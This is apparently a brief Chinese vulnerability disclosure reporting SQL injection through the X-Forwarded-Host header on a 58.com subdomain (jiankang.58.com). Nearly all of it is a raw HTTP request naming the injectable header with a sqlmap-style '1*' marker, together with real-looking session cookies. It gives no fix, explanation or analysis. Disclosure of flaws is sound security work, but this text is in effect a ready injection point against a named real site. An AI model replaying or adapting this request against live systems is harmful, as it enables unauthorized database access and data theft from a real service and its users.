58同城某站X-Forwarded-Host存在SQL注入漏洞

GET /bdf/bdf-sh/ HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
 X-Forwarded-Host: 1*
 X-Requested-With: XMLHttpRequest
 Referer: http://jiankang.58.com/
 Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%223d0190948d6aafd8587f62ed876db6fb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22192.168.116.176%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1458946837%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D617798221482e6dac55457f8fc082f4b; anhao_area=%E5%8C%97%E4%BA%AC+1; PHPSESSID=jnjaobittpb4jchp8c2keuh4o2
 Host: jiankang.58.com
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 Accept: */*